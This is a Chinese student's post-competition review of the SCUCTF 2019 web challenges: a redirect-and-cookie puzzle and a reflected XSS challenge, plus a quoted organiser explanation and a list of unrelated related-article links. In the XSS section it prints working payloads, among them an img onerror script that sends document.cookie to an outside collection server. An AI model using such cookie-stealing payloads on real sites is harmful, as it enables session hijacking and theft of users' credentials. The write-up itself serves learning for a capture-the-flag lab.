2019-5 SCUCTF 赛后学习

这次比赛几乎又爆零了。。。主要是自己学的东西太少了。。。希望今年12月份新生赛不要这么菜了

这篇文章主要是总结一下在这些赛题中，自己不会的/不熟悉的考察点。

WEB

一.来了老弟

wp写的是点进去url发生了变化，自己当时没观察到这个，然后直接点进去应该是看不出来的。
不过burp抓包下来是可以的GET /didi/ HTTP/1.1 这是抓包下来的请求头，可以看到确实一开始是didi而不是/didi/secret.php。后来查了一下，确实是，apache的默认入口文件是 index.php 但是出现的是secre.php

然后在url里修改成index.php访问一下，发现又变成了secre.php
打开f12的网络这个选项发现 index.php页面有一个302跳转点击这个页面查看cookie 发现一串base64
解码即可。
感觉自己之前都没怎么用过f12里网络这个功能去看都是直接抓包。。。这个还是很有用的

二.简单的xss

这题我简直不懂为什么我当时没做出来。。。看来比赛做题和练习。。确实感觉不太一样

http://120.78.185.175:5000/hachp1/love/index.php?greet=Hello

点进去发现是get穿参页面上也有一个hello 把参数改一下改成halo 发现被原样传回到页面上来，是一个反射性的xss

http://120.78.185.175:5000/hachp1/love/index.php?greet=<script>alert("aaa")</script>

发现弹窗，构造payload 把自己的cookie弹上去

?greet=<img/src=x onerror="a='http://120.78.185.175/xss/myxss?s=' document.cookie;new Image().src=a">

这个payload是用的img onerror的一个性质，提交到xss平台上
（提交的时候是编码过的）

?greet=%3Cimg/src=x%20onerror=%22a=%27http://120.78.185.175/xss/myxss?s=%27%2Bdocument.cookie;new%20Image().src=a%22%3E

然后f12网络里面找img文件的一个cookie
提交到那个专门的提交页面上 xss平台就看到flag了

但是我并不知道为什么要把我的payload提交到xss平台上。。。我先看看学长的三道xss综述怎么说的= =

三道 XSS 总括¶

1.此次比赛的三道 XSS 是本着不出脑洞的想法出的，题目本身没有绕太多圈圈，但是在比赛环境下没有考虑到资源占用过多和僵尸程序的情况，导致网页巨卡无比和不能打出 flag 的现象。此外，由于出题时各出题人没有协商 flag 格式的问题，我录入 docker 的时候 flag 格式就为fl4g{}，最后上题的时候又要求scuctf{}，可能坑了一些人，做题体验并不好，在这里表示抱歉2.三道题都是同一个提交平台，使用子路径作为限制(推荐阅读：https://www.cnblogs.com/fsjohnhuang/archive/2011/11/22/2258999.html)，以达到三题分离但是又使用同一个 bot 的效果。其实在这里我还是挺怕出现简单题打到困难题的 flag 的非预期解（虽然心理上还是比较肯定不会出这种情况 XD）3.所以，三道题都是将包含打 cookie payload 的 url 交给提交平台，平台 robot 使用 firefox 去访问你提交的 url，从而获取到在 cookie 里的 flag4.吐槽：xss bot 真的坑，花了很长时间来调 bot，结果比赛的时候还是出问题。。。果然是从入坑到放弃:)

顺便推荐了一篇文章。理解cookie的path和domain属性

（然而还是似懂非懂其实= =

scuctf赛后自闭相关推荐

数据可视化图表类型_数据可视化中12种最常见的图表类型
数据可视化图表类型 In the current era of large amounts of information in the form of numbers available everyw ...
CF赛后总结——一个自闭症患者的心路历程
一天嚷着"我自闭了"之类的话的人都是假自闭 2019年2月 Round #538 (Div.2) 老板让我尝试一下CF.结果连网站都不会用--A题在13分钟才提交成功. B题C题什 ...
[赛后总结]G2022 Regular Contest 02总结
由于某人的某个不过脑袋的提议,现在我们开始常规赛互测了- 常规赛01很简单,没有AK是我的问题,就不打算写了. 赛时 T1 我的组合计数果然还是一样的烂-这一道题目就花了我将近一个小时的时间- 首先我 ...
指责贝克汉姆的人,你们该闭嘴了.
贝克汉姆在赛后感谢球迷 1/8决赛,又是贝克汉姆,解救英格兰队于危急关头.如果不是小贝的那一记精准的任意球,如果不是小贝那精典的"贝氏弧线",如果不是小贝他那宝贵的右脚,英格兰还不 ...
LCYのACM退役回忆录【兼2022西安威海赛后记录】
上上周打CCPC威海,摸到了第一块CCPC铜(半步银牌):上周打ICPC西安,终于圆梦银牌,而我也离退役只差一场合肥赛站了,所以写下本文回忆并纪念短短两年的acm生涯,这期间内,多次想过放弃,但还是咬 ...
c9是什么网络语言,RNG惨败C9官博炸了！Gala自闭粉丝想起Uzi语录阿P感叹C9发文诛心...
前言:备受LOL玩家关注的2021MSI季中赛正在紧张激烈的进行,在对抗赛第二轮RNG与C9的比赛中:RNG惨败C9,赛后队员表情一言难尽,官博炸开锅,粉丝想起Uzi圣经语录米勒指出问题,阿P赛后感叹 ...
2020年湖南中医药大学“华为杯”大学生程序设计竞赛（赛后补题）
这次院赛给打自闭了,从头到尾一直落在后面,最后只拿到了二等奖尾,还是太菜了,唉(难受).多刷题!!! (未完待续) 目录 A:幸福小组 B:菜鸟驿站 C:TC的火柴 D:n盏灯 E:电子手表 F:TC ...
NOIP2018提高组心路历程（AFO+自闭）
NOIP2018提高组历程(AFO+自闭) 在不断地考试考试考试(浪浪浪)中,不知不觉,11月9号这个出征日就到来了,再出发前还是有很多小插曲的(比如刚好正面遇到她,吃好饭后还对视了一眼).随着大巴的 ...
CSP-J/S 自闭加憨憨记
i'm so difficult CSP-J总结 day1中午 day1下午考后 CSP-S总结 day-1晚上 day0上午 day0中午 day0车上 day0酒店 day0晚上 day1早上 ...

scuctf赛后自闭

2019-5 SCUCTF 赛后学习

WEB

一.来了老弟

二.简单的xss

scuctf赛后自闭相关推荐

最新文章

热门文章